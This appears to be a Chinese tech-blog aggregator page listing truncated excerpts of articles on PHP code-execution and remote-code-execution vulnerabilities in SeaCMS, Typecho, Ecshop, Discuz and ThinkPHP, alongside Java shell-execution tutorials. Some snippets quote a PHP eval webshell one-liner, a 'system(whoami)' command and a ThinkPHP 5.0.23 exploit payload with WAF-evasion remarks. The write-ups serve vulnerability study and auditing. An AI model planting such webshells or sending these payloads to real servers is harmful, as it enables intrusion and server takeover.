首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
php eval代码执行 shell
2024-11-05
记一次海洋cms任意代码执行漏洞拿shell(url一句话)
实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有一个爆破软件,可以识别验证码的,但是试了试用不了. 后天失败... 2.网上搜集该CMS的漏洞 刚才也说了,这个站没什么数据,都是空的,无上传点. 百度搜索海洋CMS的漏洞,有好几个版本的. 1)v6.28:https://www.uedbox.com/seacms-v628-0day/ 尝试失败,
【Hadoop离线基础总结】通过Java代码执行Shell命令
通过Java代码执行Shell命令 需求 在实际工作中,总会有些时候需要我们通过java代码通过远程连接去linux服务器上面执行一些shell命令,包括一些集群的状态管理,执行任务,集群的可视化界面操作等等,所以我们可以通过java代码来执行linux服务器的shell命令 为了解决上述问题,google公司给提出了对应的解决方案,开源出来了一个jar包叫做 sshxcute,通过这个jar包我们可以通过java代码,非常便捷的操作我们的linux服务器 项目下载地址:https://code
java通过http服务执行shell命令
服务端代码/** * 执行shell命令 * @param command 执行命令 * @return */public String exeCommandByPath( String command){ log.info("进入执行shell命令方法 执行命令:" + command); String returnString = ""; Process pro = null; String[] cmds = { "/bin/sh", &qu
用java代码调用shell脚本执行sqoop将hive表中数据导出到mysql
1:创建shell脚本 touch sqoop_options.sh chmod 777 sqoop_options.sh 编辑文件 特地将执行map的个数设置为变量 测试 可以java代码传参数 同时也验证sqoop的 options 属性支持这种写法 #!/bin/bash /opt/cdh-5.3.6/sqoop-1.4.5-cdh5.3.6/bin/sqoop --options-file /opt/cdh-5.3.6/sqoop-1.4.5-cdh5.3.6/sqoop-impor
Java执行shell脚本并返回结果两种方法的完整代码
Java执行shell脚本并返回结果两种方法的完整代码 简单的是直接传入String字符串,这种不能执行echo 或者需要调用其他进程的命令(比如调用postfix发送邮件命令就不起作用) 执行复杂的shell建议使用String[]方式传递(对外可以封装后也传入String字符串). /** * 运行shell脚本 * @param shell 需要运行的shell脚本 */ public static void execShell(String shell){ try { Runtime.g
第3节 sqoop:7、通过java代码远程连接linux执行shell命令
数据库的数据同步软件sqoop 数据同步 关系型数据库到大数据平台 任务:sqoop 是批量导入数据太慢,如何做到实时的数据同步 实时的数据同步工具: canal 阿里开源的一个数据库数据实时同步的软件,解析mysql的binlog日志进行数据同步 streamset 数据库的数据同步工具 flume 采集mysql的变化的数据,github上面有这样的一个项目,自定义source实时抽取mysql的数据 =============================================
转载--Typecho install.php 反序列化导致任意代码执行
转载--Typecho install.php 反序列化导致任意代码执行 原文链接(http://p0sec.net/index.php/archives/114/) 0x00 前言 漏洞公布已经过去一段时间了,当时只是利用了一下,并没有进行深度分析,现转载文章以便以后查看. 听说了这个洞,吓得赶紧去看了一下自己的博客,发现自己中招了,赶紧删除install目录. 恶意代码的大致操作顺序: base64解码后反序列化cookie中传入的__typecho_config参数, 然后让__typec
菜刀(代码执行)函数和命令执行函数详解及Getshell方法
i春秋作家:大家奥斯的哦 原文来自:https://bbs.ichunqiu.com/thread-41471-1-1.html 代码执行函数 VS 命令执行函数 一直想整理这两块的内容,但是一直没时间弄,直到前两天碰上一个写入了菜刀马但是死活连不上菜刀的站,顿时不知道怎么继续了,所以就趁这个机会整理了一下代码执行函数怎么getshell和命令执行函数怎么getshell的思路,各位大牛有什么想法可以一起交流一下.那么我们开始正题. 菜刀马的原理其实是调用了代码执行函数.而菜刀之所以能够执行系统
【代码审计】OTCMS_PHP_V2.83_代码执行漏洞分析
0x00 环境准备 OTCMS官网:http://otcms.com 网站源码版本:网钛CMS PHP版 V2.83 [更新于2017.12.31] 程序源码下载:http://d.otcms.com/php/OTCMS_PHP_V2.83.rar 测试网站首页: 0x01 代码分析 1.漏洞文件地址:/admin/sysCheckFile_deal.php 第523--540行: function SqlDeal(){ global $DB,$skin,$mudi,$menuFileID
【代码审计】YzmCMS_PHP_v3.6 代码执行漏洞分析
0x00 环境准备 YzmCMS官网:http://www.yzmcms.com/ 程序源码下载:http://pan.baidu.com/s/1pKA4u99 测试网站首页: 0x01 代码分析 1.文件位置: /application/admin/controller/sql.class.php第10-42行中: public function init() { if(isset($_POST['sqlstr'])){ if(!C('sql_execute')) showmsg('根据系
PHP代码审计笔记--代码执行漏洞
漏洞形成原因:客户端提交的参数,未经任何过滤,传入可以执行代码的函数,造成代码执行漏洞. 常见代码注射函数: 如:eval.preg_replace+/e.assert.call_user_func.call_user_func_array.create_function等函数 详见http://www.cnblogs.com/xiaozi/p/7834367.html 漏洞危害:执行代码,写入webshell.控制服务器 代码示例一: <?php //?cmd=phpinfo(); @eval
PHP代码执行函数总结
PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳. 常见代码执行函数,如 eval().assert().preg_replace().create_function() array_map().call_user_func().call_user_func_array(),array_filter,usort,uasort() 文件操作函数.动态函数($a($b)) 1.eval() eval() 函数把字符串按照 PHP 代码来计算,如常
Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析
0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HTTP_REFERER,我们可控. 分配函数用于在模版变量里赋值 再看显示函数, 读取user_passport.dwt模版文件内容,显示解析变量后的HTML内容,用_echash做分割,得到$ķ然后交给isnert_mod处理,由于_echash是默认的,不是随机生成的,所以$ VAL内容可随意控制
Discuz! 7.1 & 7.2 远程代码执行漏洞
受影响产品: Discuz! 7.1 & 7.2 漏洞描述: 产生漏洞的$scriptlang数组在安装插件后已经初始化 Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令. 下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的: 一.漏洞来自showmessage函数: function showmessage($message, $url_forward = '', $extra
Discuz! ML远程代码执行(CVE-2019-13956)
Discuz! ML远程代码执行(CVE-2019-13956) 一.漏洞描述 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行. 二.漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三.漏洞环境搭建 1. 官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download 2. 将压缩包解压到phpstudy网站根目录,浏览器
tiki-graph_formula.php代码执行漏洞复现(或许??)
1.不知道从哪里翻出来的虚拟机镜像(不知道甚么时候出现在磁盘里面的) 打开配置一下是tikiwiki这个东西 2.遇到陌生的玩意总是忍不住好奇心的,打开nikto扫描一下,发现有些奇怪的东西 本来没抱希望的,没想到还真扫描出来了,里面有一个phpinfo.php,一个phpMyAdmin,一个似乎是TikiWiki漏洞 3.Metasploit 打开msf,search一下tikiwiki 五个payload,逐个试 use auxiliary/admin/tikiwiki/tikidblib
php中代码执行&&命令执行函数
转自i春秋 1.eval()函数 #传入的参数必须为PHP代码,既需要以分号结尾. #命令執行:cmd=system(whoami); #菜刀连接密码:cmd <?php @eval($_POST['cmd']);?> 那么当我们上传了eval函数的菜刀马之后,在连接不上菜刀的情况下怎么上传大马呢?继续往下看这里我是先写一个上传马,再用上传马去上传大马,有点多次一举,但是考虑到大马代码量太多,还是建议先写个上传马,以下代码只有1kb. <?php @$temp = $_FILES['up
CTF RCE(远程代码执行)
目录 php代码执行 一.相关函数 1.代码注入 2.命令执行 二.命令执行的绕过 1.命令执行的分隔符 2.空格代替 3.绕过 4.命令执行的各种符号 三.命令无回显的情况 1.判断 2.利用 四.可控字符串长度受限 1.15个字符 2.7个字符 五.无数字字母getshell 六.补充 php代码执行 一.相关函数 1.代码注入 eval() 传入的必须是有效的 PHP 代码.所有的语句必须以分号结尾. return 语句会立即中止当前字符串的执行. 代码执行的作用域是调用 eval() 处
记一次有趣的tp5代码执行
0x00 前言 朋友之前给了个站,拿了很久终于拿下,简单记录一下. 0x01 基础信息 漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1 无回显,根据payload 成功判断目标thinkphp 版本应为5.0.23 有waf,waf拦截了以下内容 php标记: <?php <?= &l
记一次有趣的thinkphp代码执行
0x00 前言 朋友之前给了个站,拿了很久终于拿下,简单记录一下. 0x01 基础信息 漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1 无回显,根据payload 成功判断目标thinkphp 版本应为5.0.23 有waf,waf拦截了以下内容 php标记: <?php <?= &l
热门专题
sublime text 3 里怎么修改扩展名对应的文件类型
solr 界面如何设置指定字段ik分词器
vue qrcodejs2 样式修改
excel if判断时间段早晚班
java markdown导出word
TGA格式转换成DDS
如何在html中插入动态
css鼠标经过修改伪类元素的颜色
python模拟ip访问url
hive -e 指定分隔符
flask路由 通配符
r语言class同时返回array和matrix
RotatedRect 点坐标
MFC 定时激活窗口
nginx安装testlink
gitee解除上传限制
在新系统下载一个软件说会损坏设置
c# dynamic 转换成自定义类
js post 上传图片
jmeter大文件解析